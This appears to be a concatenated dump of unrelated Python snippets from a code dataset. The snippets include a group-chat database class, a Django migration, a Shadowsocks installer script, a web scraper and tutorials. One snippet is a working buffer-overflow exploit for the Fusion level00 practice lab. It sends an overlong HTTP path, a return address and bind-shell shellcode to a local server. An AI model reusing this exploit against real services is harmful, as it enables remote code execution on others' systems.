text stringlengths 8 6.05M |
|---|
# -*- coding: utf-8 -*-
#信用卡账单分析
"""
终极目标是能分析网上的账单
阶段一:分析csv中的账单
"""
import pandas as pd
import matplotlib.pyplot as plt
cardFee = pd.read_csv('C:\Users\cyn\Desktop\cradicard.csv',header=None,encoding="gb2312")
cardFee[2]=cardFee[2].map(lambda df:float(df.replace('RMB','')))
cardFee.index = cardFee[1]
cardFee.plot(kind='barh') |
print("Введите имя")
spravochnik_telefonov = {}
def spravochnik(spravochnik_telefonov):
while True:
name = str(input())
if name != 'q':
print("Введите номер телефона в формате +7-***-***-**-**")
a = str(input())
if a[0] == "+" and a[1] == "7" and a[2] == "-" and \
a[6] == "-" and a[10] == "-" and a[13] == "-" and len(a) == 16 :
if a[1:].replace("-", "").isdigit():
spravochnik_telefonov[name] = a
print("Введите имя")
else:
print("Неправильный формат телефона, попробуйте снова")
print("Введите имя")
else:
print("Неправильный формат телефона, попробуйте снова")
print("Введите имя")
if name == 'q':
print("Ваш справочник")
print(spravochnik_telefonov)
break
spravochnik(spravochnik_telefonov) |
# -*- coding: utf-8 -*-
import logging
import redis
import time
class Group(object):
GROUP_EVENT_CREATE = "group_create"
GROUP_EVENT_DISBAND = "group_disband"
GROUP_EVENT_UPGRADE = "group_upgrade"
GROUP_EVENT_MEMBER_ADD = "group_member_add"
GROUP_EVENT_MEMBER_REMOVE = "group_member_remove"
GROUP_EVENT_MEMBER_MUTE = "group_member_mute"
#外部指定groupid
@staticmethod
def create_group_ext(db, group_id, appid, master, name, is_super, members):
now = int(time.time())
db.begin()
sql = "INSERT INTO `group`(id, appid, master, name, super) VALUES(%s, %s, %s, %s, %s)"
s = 1 if is_super else 0
r = db.execute(sql, (group_id, appid, master, name, s))
for m in members:
sql = "INSERT INTO group_member(group_id, uid, timestamp) VALUES(%s, %s, %s)"
db.execute(sql, (group_id, m, now))
db.commit()
return group_id
#使用自增的groupid
@staticmethod
def create_group(db, appid, master, name, is_super, members):
now = int(time.time())
db.begin()
sql = "INSERT INTO `group`(appid, master, name, super) VALUES(%s, %s, %s, %s)"
s = 1 if is_super else 0
r = db.execute(sql, (appid, master, name, s))
group_id = r.lastrowid
for m in members:
sql = "INSERT INTO group_member(group_id, uid, timestamp) VALUES(%s, %s, %s)"
db.execute(sql, (group_id, m, now))
db.commit()
return group_id
@staticmethod
def update_group_name(db, group_id, name):
sql = "UPDATE `group` SET name=%s WHERE id=%s"
r = db.execute(sql, (name, group_id))
logging.debug("update group name rows:%s", r.rowcount)
@staticmethod
def update_group_notice(db, group_id, notice):
sql = "UPDATE `group` SET notice=%s WHERE id=%s"
r = db.execute(sql, (notice, group_id))
logging.debug("update group notice rows:%s", r.rowcount)
@staticmethod
def update_group_super(db, group_id, is_super):
sql = "UPDATE `group` SET super=%s WHERE id=%s"
s = 1 if is_super else 0
r = db.execute(sql, (s, group_id))
logging.debug("update group super:%s", r.rowcount)
@staticmethod
def disband_group(db, group_id):
db.begin()
sql = "DELETE FROM `group` WHERE id=%s"
r = db.execute(sql, group_id)
logging.debug("rows:%s", r.rowcount)
sql = "DELETE FROM group_member WHERE group_id=%s"
r = db.execute(sql, group_id)
logging.debug("delete group rows:%s", r.rowcount)
db.commit()
@staticmethod
def add_group_member(db, group_id, member_id):
now = int(time.time())
sql = "INSERT INTO group_member(group_id, uid, timestamp) VALUES(%s, %s, %s)"
r = db.execute(sql, (group_id, member_id, now))
logging.debug("insert rows:%s", r.rowcount)
@staticmethod
def delete_group_member(db, group_id, member_id):
sql = "DELETE FROM group_member WHERE group_id=%s AND uid=%s"
r = db.execute(sql, (group_id, member_id))
logging.debug("delete group member rows:%s", r.rowcount)
@staticmethod
def get_group_members(db, group_id):
sql = "SELECT uid, nickname FROM group_member WHERE group_id=%s"
r = db.execute(sql, group_id)
return list(r.fetchall())
@staticmethod
def update_nickname(db, group_id, member_id, nickname):
sql = "UPDATE `group_member` SET nickname=%s WHERE group_id=%s AND uid=%s"
r = db.execute(sql, (nickname, group_id, member_id))
logging.debug("update nickname rows:%s", r.rowcount)
@staticmethod
def update_mute(db, group_id, member_id, mute):
m = 1 if mute else 0
sql = "UPDATE `group_member` SET mute=%s WHERE group_id=%s AND uid=%s"
r = db.execute(sql, (m, group_id, member_id))
logging.debug("update mute rows:%s", r.rowcount)
@staticmethod
def get_group_master(db, group_id):
sql = "SELECT master FROM `group` WHERE id=%s"
cursor = db.execute(sql, group_id)
r = cursor.fetchone()
master = r["master"]
return master
@staticmethod
def get_group(db, group_id):
sql = "SELECT id, appid, master, super, name, COALESCE(notice, '') as notice FROM `group` WHERE id=%s"
cursor = db.execute(sql, group_id)
r = cursor.fetchone()
return r
#获取用户所在的所有群
@staticmethod
def get_groups(db, appid, uid):
sql = "SELECT g.id, g.appid, g.master, g.super, g.name, COALESCE(g.notice, '') as notice FROM `group_member`, `group` as g WHERE group_member.uid=%s AND group_member.group_id=g.id AND g.appid=%s"
cursor = db.execute(sql, (uid, appid))
return list(cursor.fetchall())
@staticmethod
def publish_create_event(rds, appid, gid, is_super):
s = 1 if is_super else 0
content = {
"group_id": gid,
"app_id": appid,
"super": s,
"name": Group.GROUP_EVENT_CREATE
}
Group.publish_message(rds, content)
@staticmethod
def publish_upgrade_event(rds, appid, gid):
content = {
"group_id": gid,
"app_id": appid,
"super": 1,
"name": Group.GROUP_EVENT_UPGRADE
}
Group.publish_message(rds, content)
@staticmethod
def publish_disband_event(rds, gid):
content = {"group_id": gid, "name": Group.GROUP_EVENT_DISBAND}
Group.publish_message(rds, content)
@staticmethod
def publish_member_mute_event(rds, gid, member_id, is_mute):
mute = 1 if is_mute else 0
content = {
"group_id":gid,
"member_id":member_id,
"mute":mute,
"name":Group.GROUP_EVENT_MEMBER_MUTE
}
Group.publish_message(rds, content)
@staticmethod
def publish_member_add_event(rds, gid, member_id):
content = {
"group_id": gid,
"member_id": member_id,
"name": Group.GROUP_EVENT_MEMBER_ADD
}
Group.publish_message(rds, content)
@staticmethod
def publish_member_remove_event(rds, gid, member_id):
content = {
"group_id": gid,
"member_id": member_id,
"name": Group.GROUP_EVENT_MEMBER_REMOVE
}
Group.publish_message(rds, content)
# groups_actions_id 每个操作的序号,自增
# groups_actions 记录之前的action ID 和当前的action ID 格式:"prev_id:id"
@staticmethod
def publish_message(rds, msg):
with rds.pipeline() as pipe:
while True:
try:
pipe.watch("groups_actions_id")
pipe.watch("groups_actions")
action_id = pipe.get("groups_actions_id")
action_id = int(action_id) if action_id else 0
action_id = action_id + 1
group_actions = pipe.get("groups_actions")
prev_id = 0
if group_actions:
_, prev_id = group_actions.split(":")
pipe.multi()
pipe.set("groups_actions_id", action_id)
group_actions = "%s:%s"%(prev_id, action_id)
pipe.set("groups_actions", group_actions)
m = msg.copy()
m["previous_action_id"] = prev_id
m["action_id"] = action_id
pipe.xadd("group_manager_stream", m, maxlen=100000)
pipe.execute()
logging.info("xadd group event:%s to stream", m)
break
except redis.WatchError as e:
logging.info("watch err:%s", e)
|
# Generated by Django 2.0.3 on 2018-11-05 07:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Pasta',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pasta', models.CharField(max_length=63)),
],
),
migrations.CreateModel(
name='Pizza',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pizza', models.CharField(max_length=63)),
],
),
migrations.CreateModel(
name='PizzaTopping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('topping', models.CharField(max_length=63)),
],
),
migrations.CreateModel(
name='PizzaType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pizzaType', models.CharField(max_length=63)),
],
),
migrations.CreateModel(
name='Platter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('platter', models.CharField(max_length=63)),
],
),
migrations.CreateModel(
name='Salad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('salad', models.CharField(max_length=63)),
],
),
migrations.CreateModel(
name='Size',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=7)),
('size', models.CharField(max_length=63)),
],
),
migrations.CreateModel(
name='Sub',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sub', models.CharField(max_length=63)),
('size', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sub_size', to='orders.Size')),
],
),
migrations.CreateModel(
name='SubExtra',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subExtra', models.CharField(max_length=63)),
],
),
migrations.AddField(
model_name='sub',
name='subExtra',
field=models.ManyToManyField(blank=True, related_name='sub_extra', to='orders.SubExtra'),
),
migrations.AddField(
model_name='platter',
name='size',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='platter_size', to='orders.Size'),
),
migrations.AddField(
model_name='pizza',
name='pizzaToppings',
field=models.ManyToManyField(blank=True, related_name='pizza_toppings', to='orders.PizzaTopping'),
),
migrations.AddField(
model_name='pizza',
name='pizzaType',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pizza_type', to='orders.PizzaType'),
),
migrations.AddField(
model_name='pizza',
name='size',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pizza_size', to='orders.Size'),
),
]
|
#!/usr/bin/env python3
#
# Internal Reporting Tool.
#
# This tool queries the "news" postgre database to answer the following:
# 1. What are the most popular three articles of all time?
# 2. Who are the most popular article authors of all time?
# 3. On which days did more than 1% of requests lead to errors?
import psycopg2
import bleach
# each views table name, formatted result string, and question answered
views = [
(0, 'popular_articles',
'''\n"{0}" - {1} views''',
'\n\nWhat are the most popular three articles of all time?'),
(1, 'popular_authors',
'''\n{0} - {1} views''',
'\n\nWho are the most popular article authors of all time?'),
(2, 'error_one_percent',
'''\n{0} - {1:.1f}% errors''',
'\n\nOn which days did more than 1% of requests lead to errors?')
]
def get_report(view):
"""Returns db query results for 'view' from 'news' db"""
news = psycopg2.connect("dbname=news")
cursor = news.cursor()
# cant do this for sql injects: cursor.execute('select * from %s', (view,))
# use integers inputs to method only
cursor.execute('select * from %s' % views[view][1])
rows = cursor.fetchall()
news.close()
return rows
if __name__ == '__main__':
# display reports
for view in views:
results = get_report(view[0])
print(view[3])
print("".join(view[2].format(val, count) for val, count in results))
# finish
print("\n\n")
|
#! /usr/bin/python
#-*- coding:utf-8 -*-
#Shadowsocks Win32 Server Setup Script (Python)
#By Vincent Lau @ tfp.io
#Email: me@tffans.cn
import os
import sys
import time
#Function of Check and Create the Config File for the Server
def ConfigFile():
if os.path.exists(inipath):
ConfigIsExist = True
else:
ConfigIsExist = False
if ConfigIsExist:
pass
else:
print "This is the first time for you to use this server, now let's go to configure it."
ServerIP = raw_input("Please enter the IP of you Server. \nUse :: if you want to accept all the connections including IPV6. \nDefault: 127.0.0.1\n")
if ServerIP == "":
ServerIP = "127.0.0.1"
ServerPort = raw_input("Please enter the Port of you Server. \nDefault: 8388\n")
if ServerPort == "":
ServerPort = "8388"
ServerPass = raw_input("Please enter the Passcode of you Server. \nDefault: tfp.io\n")
if ServerPass == "":
ServerPass = "tfp.io"
ServerMethod = raw_input("Please enter the Method of you Server. \nIf you do not know what it is, just remember the default method. \nDefault: aes-256-cfb\n")
if ServerMethod == "":
ServerMethod = "aes-256-cfb"
ConfigContent = open(jsonpath,"w")
ConfigContent.write("{")
ConfigContent.close
ConfigContent = open(jsonpath,"a")
ConfigContent.write("\n \"server\":\"%s\"," % ServerIP)
ConfigContent.write("\n \"server_port\":\"%s\"," % ServerPort)
ConfigContent.write("\n \"local_address\":\"127.0.0.1\",")
ConfigContent.write("\n \"local_port\":\"1080\",")
ConfigContent.write("\n \"password\":\"%s\"," % ServerPass)
ConfigContent.write("\n \"timeout\":600,")
ConfigContent.write("\n \"method\":\"%s\"" % ServerMethod)
ConfigContent.write("\n}")
ConfigContent.close
print "Config Json File Created Successfully! \nFor other options, you can modify the config file by yourself!"
ConfigContent = open(inipath,"w")
ConfigContent.write("No Delete this File!")
ConfigContent.close
if os.path.exists(appdata_path + r"\tmp.vbs"):
msg = raw_input("Please re-run the script to make it work! Press Enter to exit this script...")
sys.exit()
#Download Node.js v0.10.36 from the official site
def DownNode():
import urllib2
print "I\'m going to download, and when finished, you will receive another message!"
url = r'http://npm.taobao.org/mirrors/node/v0.10.36/node-v0.10.36-x86.msi'
f = urllib2.urlopen(url)
data = f.read()
with open(appdata_path + r"\node-v0.10.36-x86.msi", "wb") as code:
code.write(data)
print "Operation Finished! Start to install!"
#Set basic path for this script
appdata_path = os.getenv("APPDATA")
inipath = appdata_path + r"\npm\node_modules\shadowsocks\sserver.ini"
jsonpath = appdata_path + r"\npm\node_modules\shadowsocks\config.json"
#Check whether a process is running
def check_exist(process_name):
try:
import win32com.client
except:
msg = raw_input("WARNING: I CANNOT FIND PYWIN32 LIBS IN YOU PYTHON! YOU MUST INSTALL IT! \nPress Enter to Exit...")
sys.exit()
WMI = win32com.client.GetObject('winmgmts:')
processCodeCov = WMI.ExecQuery('select * from Win32_Process where Name="%s"' % process_name)
if len(processCodeCov) > 0:
return True
else:
return False
#Run the SSServer
def RunServer():
ConfigFile()
VBScript()
print "Shodowsocks Server Started Successfully! \nNote: YOU CAN MODIFY THE CONFIG AS YOU LIKE. \nPath: " + appdata_path + r"\npm\node_modules\shadowsocks\config.json"
print "The script will exit in 5 seconds..."
time.sleep(5)
sys.exit()
def VBScript():
if os.path.exists(appdata_path + r"\tmp.vbs"):
os.system(appdata_path + r"\tmp.vbs")
else:
TmpVBS = open(appdata_path + r"\tmp.vbs","w")
TmpVBS.write("set SSServer = WScript.CreateObject(\"WScript.Shell\") \n")
TmpVBS.write("SSServer.Run \"%AppData%\\npm\\ssserver\",0 ")
TmpVBS.close
msg = raw_input("Please re-run the script to make the startup script work! Press Enter to exit this script...")
sys.exit()
#Check whether Node is running
if check_exist('node.exe'):
print "Warning: I have detected that one or more Node instances are running, plaese close them before you can start a server. Wanna Close them? (y/n)\n"
msg = raw_input()
if msg == "y":
os.system(r"taskkill /f /im node.exe")
print "Success! I\'ll just go on to the next process..."
else:
sys.exit()
#Check if Node.js is Installed
if os.path.exists(appdata_path + r"\npm"):
NodeIsExist = True
else:
NodeIsExist = False
#Check if SSServer is Installed
if os.path.exists(appdata_path + r"\npm\node_modules\shadowsocks"):
SSIsExist = True
else:
SSIsExist = False
#Main Part
if SSIsExist:
RunServer()
elif NodeIsExist:
print "Sorry, but I cannot find Shadowsocks(node.js) in your computer, please try to install one. \nNote: ONLY NODE.JS VERSION IS ACCEPTABLE! \nWanna install it? (y/n)\n"
msg = raw_input()
if msg == "y":
print "Prepare to install, please wait..."
os.system(r"npm config set registry http://registry.cnpmjs.org & npm install -g shadowsocks")
print "Success! I\'ll just go on to the next process..."
RunServer()
else:
sys.exit()
else:
print "Sorry, but I cannot find Node.js in your computer, please try to install one. \nNote: PLEASE USE V0.10.X, THE LATEST VERSION IS NOT RECOMMENDED! \nWanna install it? (y/n)\n"
msg = raw_input()
if msg == "y":
print "Prepare to install, please wait..."
DownNode()
os.system(r"%appdata%\node-v0.10.36-x86.msi /qb")
os.makedirs(appdata_path + r"\npm")
msg = raw_input("Success! Please restart the script! Press enter to exit...")
sys.exit()
|
from django.http import HttpResponse
from .models import *
from django.shortcuts import render
def index(request):
data = Med.objects.all()
context= {'data':data}
return render(request, 'index.html', context)
def signup(request):
return render(request, 'signup.html')
def loginPage(request):
return render(request, 'loginPage.html')
def base(request):
return render(request, 'base.html')
|
# Currency converter from USD to BITCOINS
def convert_Usd_bitcoin(amount):
# amount must be an integer and it must be greater than zero.
if not isinstance(amount, int) or amount <= 0: #Our pre condition check..
print('0 USD is equal to 0.0 Bitcoins') # Our pre condition print statement
return amount
else:
rate = 0.00013 # Assumed rate
bitcoin = amount * rate # Our post condition check
# Our post condition print statement..
print(str(amount) + ' USD is equal to ' + str(bitcoin) + ' bitcoins')
return bitcoin
# Prints a statement of our conversion.
convert_Usd_bitcoin(40)
|
#B
intg7=int(input())
if((intg7%2)==0):
print(int(intg7/2))
else:
print(intg7)
|
# https://exploit-exercises.com/fusion/level00/
import socket
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 20000)
sock.connect(server_address)
# GET path...retaddr HTTP/1.1shellcode
retaddr = 0xbffff8f8 + 4 + 143 + 9
path = "A"*139 + struct.pack("<I", retaddr)
# https://www.exploit-db.com/exploits/40056/
shellcode = "\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68" + \
"\x11\x5c" + \
"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56" + \
"\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f" + \
"\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"
payload = "GET " + path + " HTTP/1.1" + shellcode
sock.send(payload)
sock.close()
|
"""
字典与列表的最大区别就是:
字典中强调的是‘键值对’,key与value一一对应
"""
# 字典的创建
a1 = {"name": "xiaoming", "sex": "man", "id": 1}
print(a1)
a2 = dict(id=1, name="xiaoming")
print(a2)
a3 = {}
a3["name"] = "xiaoming"
a3["id"] = 1
print(a3)
# 字典推导式
a4 = {x: x**2 for x in [1, 2, 3]}
print(a4)
# key是字典的键,返回的是对应的值value
# get方法获取键的值,若键不存在,则返回设定的默认值default(默认为None)
print(a1["name"])
print(a1.get("name"))
print(a1.get(1))
# 遍历
for i in a1.keys():
print(i, a1[i])
for i in a1:
print(i, a1[i])
for keys, values in a1.items():
print(keys, values)
# 排序
# 1.借助.keys()方法和list()函数将键提取成list,对list排序后输出
D = {'a': 1, 'c': 3, 'b': 2}
D1 = list(D.keys())
print(D1)
D1.sort()
for i in D1:
print(i, D[i])
# 2.借助内置的sorted()函数可对任意对象类型排序,返回排序后的结果
D2 = {'a': 1, 'c': 3, 'b': 2}
print(sorted(D2))
for i in sorted(D2):
print(i, D[i])
|
from math import pi, tan
def polysum(n, s):
def area():
return 0.25 * n * s**2 / tan(pi/n)
def square_perimeter():
return (n*s)**2
return area() + square_perimeter()
print(polysum(56, 86))
print(polysum(22, 36))
print(polysum(66, 66))
print(polysum(22, 28))
print(polysum(1, 98))
print(polysum(19, 72))
|
import scrapy
import datetime
from scrapy.selector import Selector
from beer.items import Brewery
from beer.items import Beer
class MainStSpider(scrapy.Spider):
name = 'mainst'
allowed_domains = ['mainstreetbeer.ca']
start_urls = ['http://mainstreetbeer.ca/']
def start_requests(self):
urls = [
'http://mainstreetbeer.ca/'
]
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
brewery = Brewery()
brewery['last_updated'] = datetime.datetime.utcnow()
brewery['name'] = 'Main Street Brewing'
brewery['address'] = '261 East Seventh Avenue, Vancouver, BC'
brewery['url'] = 'http://mainstreetbeer.ca/'
brewery['growlers'] = []
brewery['tasting_room'] = []
wrapper = Selector(response).xpath("//div[@class='portfolio-wrap ']")[0]
ontap = wrapper.xpath('./div/child::*')
for beer in ontap:
item = Beer()
url = beer.xpath('.//div[@class="work-info"]/a/@href').extract()
item['url'] = url[0]
name = beer.xpath('.//div[@class="vert-center"]/h3/text()').extract()
item['name'] = name[0].upper()
style = name[0].split()
item['style'] = style[-1].upper()
item['abv'] = '--'
brewery['tasting_room'].append(item)
growlerWrapper = Selector(response).xpath("//div[@class='portfolio-wrap ']")[0]
fills = wrapper.xpath('./div/child::*')
for beer in fills:
item = Beer()
url = beer.xpath('.//div[@class="work-info"]/a/@href').extract()
item['url'] = url[0]
name = beer.xpath('.//div[@class="vert-center"]/h3/text()').extract()
item['name'] = name[0].upper()
style = name[0].split()
item['style'] = style[-1].upper()
item['abv'] = '--'
brewery['growlers'].append(item)
yield brewery
|
import re
def get_current_method():
from script import base_api
current_methods = dir(base_api)
methods = ["get", "post", "patch", "head", "delete", "put"]
current_methods = [x for x in current_methods if x.split("_")[-1] in methods]
return current_methods
def get_method_name(url: str):
if re.match(r".*\d+", url):
method_re = re.sub(r"_\d+", "_.+?", url)
method_names = [x for x in get_current_method() if re.match(method_re, x)]
if method_names:
return method_names[0]
else:
return url
else:
return url
def get_method(url, method):
server_name, method_name = url[1:].replace("-", "_").split("/", 1)
file_name = method_name.split("/")[0]
server_name = server_name
method_name = get_method_name(method_name.replace("/", "_") + "_" + method.lower())
print(f"from script.base_api.{server_name}.{file_name} import {method_name}")
if __name__ == '__main__':
get_method("/api-operation-app/employee/login", "POST")
|
from PACK import *
from torch.optim.lr_scheduler import StepLR
from encoder import Encoder
from model import SupervisedGraphSAGE
from utils import buildTestData
from collect_graph import removeIsolated, collectGraph_train, collectGraph_train_v2, collectGraph_test
import numpy as np
import math
import time
import random
import visdom
from tqdm import tqdm
import argparse
import ast
eval_func = '/path/to/compute_ap'
retrieval_result = '/path/to/retrieval'
test_dataset = {
'oxf': {
'node_num': 5063,
'img_testpath': '/path/to/images',
'feature_path': '/path/to/feature',
'gt_path': '/path/to/oxford5k_groundTruth',
},
'par': {
'node_num': 6392,
'img_testpath': '/path/to/images',
'feature_path': '/path/to/feature',
'gt_path': '/path/to/paris6k_groundTruth',
}
}
building_oxf = buildTestData(img_path=test_dataset['oxf']['img_testpath'], gt_path=test_dataset['oxf']['gt_path'], eval_func=eval_func)
building_par = buildTestData(img_path=test_dataset['par']['img_testpath'], gt_path=test_dataset['par']['gt_path'], eval_func=eval_func)
building = {
'oxf': building_oxf,
'par': building_par,
}
def makeModel(node_num, class_num, feature_map, adj_lists, args):
## feature embedding
embedding = nn.Embedding(node_num, args.feat_dim)
embedding.weight = nn.Parameter(torch.from_numpy(feature_map).float(), requires_grad=False)
## two-layer encoder
encoder_1 = Encoder(embedding, args.feat_dim, args.embed_dim_1, adj_lists, num_sample=args.num_sample, gcn=args.use_gcn, use_cuda=args.use_cuda)
##
## lambda doesn't support gradient backward !!!
##
encoder_2 = Encoder(lambda nodes: encoder_1(nodes).t(), args.embed_dim_1, args.embed_dim_2, adj_lists, num_sample=args.num_sample, gcn=args.use_gcn, use_cuda=args.use_cuda)
## model
graphsage = SupervisedGraphSAGE(class_num, encoder_1, encoder_2)
if args.use_cuda:
embedding.cuda()
encoder_1.cuda()
encoder_2.cuda()
graphsage.cuda()
return graphsage
def train(args):
## load training data
print "loading training data ......"
node_num, class_num = 33792, 569
label, feature_map, adj_lists = collectGraph_train_v2(node_num, class_num, args.feat_dim, args.num_sample, args.suffix)
graphsage = makeModel(node_num, class_num, feature_map, adj_lists, args)
optimizer = torch.optim.Adam([
{'params': filter(lambda para: para.requires_grad, graphsage.parameters()), 'lr': args.learning_rate},
])
scheduler = StepLR(optimizer, step_size=args.step_size, gamma=0.1)
## train
np.random.seed(2)
random.seed(2)
rand_indices = np.random.permutation(node_num)
train_nodes = list(rand_indices[:args.train_num])
val_nodes = list(rand_indices[args.train_num:])
epoch_num = args.epoch_num
batch_size = args.batch_size
iter_num = int(math.ceil(args.train_num / float(batch_size)))
check_loss = []
val_accuracy = []
check_step = args.check_step
train_loss = 0.0
iter_cnt = 0
for e in range(epoch_num):
graphsage.train()
scheduler.step()
random.shuffle(train_nodes)
for batch in range(iter_num):
batch_nodes = train_nodes[batch*batch_size: (batch+1)*batch_size]
positive_nodes = [random.choice(list(adj_lists[n])) for n in batch_nodes]
batch_label = Variable(torch.LongTensor(label[batch_nodes]))
if args.use_cuda:
batch_label = batch_label.cuda()
optimizer.zero_grad()
loss = graphsage.loss(batch_nodes, batch_label)
loss.backward()
optimizer.step()
iter_cnt += 1
train_loss += loss.cpu().item()
if iter_cnt % check_step == 0:
check_loss.append(train_loss/check_step)
print time.strftime('%Y-%m-%d %H:%M:%S'), "epoch: {}, iter: {}, loss:{:.4f}".format(e, iter_cnt, train_loss/check_step)
train_loss = 0.0
## validation
graphsage.eval()
group = int(math.ceil(len(val_nodes)/float(batch_size)))
val_cnt = 0
for batch in range(group):
batch_nodes = val_nodes[batch*batch_size: (batch+1)*batch_size]
batch_label = label[batch_nodes].squeeze()
_, score = graphsage(batch_nodes)
batch_predict = np.argmax(score.cpu().data.numpy(), axis=1)
val_cnt += np.sum(batch_predict == batch_label)
val_accuracy.append(val_cnt/float(len(val_nodes)))
print time.strftime('%Y-%m-%d %H:%M:%S'), "Epoch: {}, Validation Accuracy: {:.4f}".format(e, val_cnt/float(len(val_nodes)))
print "******" * 10
checkpoint_path = 'checkpoint/checkpoint_{}.pth'.format(time.strftime('%Y%m%d%H%M'))
torch.save({
'train_num': args.train_num,
'epoch_num': args.epoch_num,
'learning_rate': args.learning_rate,
'embed_dim_1': args.embed_dim_1,
'embed_dim_2': args.embed_dim_2,
'num_sample': args.num_sample,
'use_gcn': args.use_gcn,
'graph_state_dict': graphsage.state_dict(),
'optimizer': optimizer.state_dict(),
},
checkpoint_path)
vis = visdom.Visdom(env='Graph', port='8099')
vis.line(
X = np.arange(1, len(check_loss)+1, 1) * check_step,
Y = np.array(check_loss),
opts = dict(
title=time.strftime('%Y-%m-%d %H:%M:%S') + ', gcn {}'.format(args.use_gcn),
xlabel='itr.',
ylabel='loss'
)
)
vis.line(
X = np.arange(1, len(val_accuracy)+1, 1),
Y = np.array(val_accuracy),
opts = dict(
title=time.strftime('%Y-%m-%d %H:%M:%S') + ', gcn {}'.format(args.use_gcn),
xlabel='epoch',
ylabel='accuracy'
)
)
return checkpoint_path, class_num
def test(checkpoint_path, class_num, args):
for key in building.keys():
node_num = test_dataset[key]['node_num']
old_feature_map, adj_lists = collectGraph_test(test_dataset[key]['feature_path'], node_num, args.feat_dim, args.num_sample, args.suffix)
graphsage = makeModel(node_num, class_num, old_feature_map, adj_lists, args)
checkpoint = torch.load(checkpoint_path)
graphsage_state_dict = graphsage.state_dict()
for w in ['weight', 'encoder_1.weight', 'encoder.weight']:
graphsage_state_dict.update({w: checkpoint['graph_state_dict'][w]})
graphsage.load_state_dict(graphsage_state_dict)
graphsage.eval()
batch_num = int(math.ceil(node_num/float(args.batch_size)))
new_feature_map = torch.FloatTensor()
for batch in tqdm(range(batch_num)):
start_node = batch*args.batch_size
end_node = min((batch+1)*args.batch_size, node_num)
test_nodes = range(start_node, end_node)
new_feature, _ = graphsage(test_nodes)
new_feature = F.normalize(new_feature, p=2, dim=0)
new_feature_map = torch.cat((new_feature_map, new_feature.t().cpu().data), dim=0)
new_feature_map = new_feature_map.numpy()
old_similarity = np.dot(old_feature_map, old_feature_map.T)
new_similarity = np.dot(new_feature_map, new_feature_map.T)
mAP_old = building[key].evalRetrieval(old_similarity, retrieval_result)
mAP_new = building[key].evalRetrieval(new_similarity, retrieval_result)
print time.strftime('%Y-%m-%d %H:%M:%S'), 'eval {}'.format(key)
print 'base feature: {}, new feature: {}'.format(old_feature_map.shape, new_feature_map.shape)
print 'base mAP: {:.4f}, new mAP: {:.4f}, improvement: {:.4f}'.format(mAP_old, mAP_new, mAP_new-mAP_old)
print ""
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Supervised GraphSAGE, train on Landmark_clean, test on Oxford5k and Paris6k.')
parser.add_argument('-E', '--epoch_num', type=int, default=70, required=False, help='training epoch number.')
parser.add_argument('-R', '--step_size', type=int, default=30, required=False, help='learning rate decay step_size.')
parser.add_argument('-B', '--batch_size', type=int, default=128, required=False, help='training batch size.')
parser.add_argument('-S', '--check_step', type=int, default=50, required=False, help='loss check step.')
parser.add_argument('-C', '--use_cuda', type=ast.literal_eval, default=True, required=False, help='whether to use gpu (True) or not (False).')
parser.add_argument('-G', '--use_gcn', type=ast.literal_eval, default=True, required=False, help='whether to use gcn (True) or not (False).')
parser.add_argument('-L', '--learning_rate', type=float, default=0.005, required=False, help='training learning rate.')
parser.add_argument('-N', '--num_sample', type=int, default=10, required=False, help='number of neighbors to aggregate.')
parser.add_argument('-x', '--suffix', type=str, default='.frmac.npy', required=False, help='feature type, \'f\' for vggnet (512-d), \'fr\' for resnet (2048-d), \'frmac\' for vgg16_rmac (512-d).')
parser.add_argument('-f', '--feat_dim', type=int, default=512, required=False, help='input feature dim of node.')
parser.add_argument('-d', '--embed_dim_1', type=int, default=512, required=False, help='embedded feature dim of encoder_1.')
parser.add_argument('-D', '--embed_dim_2', type=int, default=512, required=False, help='embedded feature dim of encoder_2.')
parser.add_argument('-T', '--train_num', type=int, default=25000, required=False, help='number of training nodes (less than 36460). Left for validation.')
args, _ = parser.parse_known_args()
print "< < < < < < < < < < < Supervised GraphSAGE > > > > > > > > > >"
print "= = = = = = = = = = = PARAMETERS SETTING = = = = = = = = = = ="
for k, v in vars(args).items():
print k, ":", v
print "= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ="
# print "training ......"
checkpoint_path, class_num = train(args)
print "testing ......"
test(checkpoint_path, class_num, args)
|
#!/usr/bin/env python
# coding: utf-8
# # Pandas full tutorial : Most useful techniques
# In[2]:
#import all the libraries
#Pandas : for data analysis
#numpy : for Scientific Computing.
#matplotlib and seaborn : for data visualization
#scikit-learn : ML library for classical ML algorithms
#math :for mathematical functions
import pandas as pd
import numpy as np
from numpy.random import randn
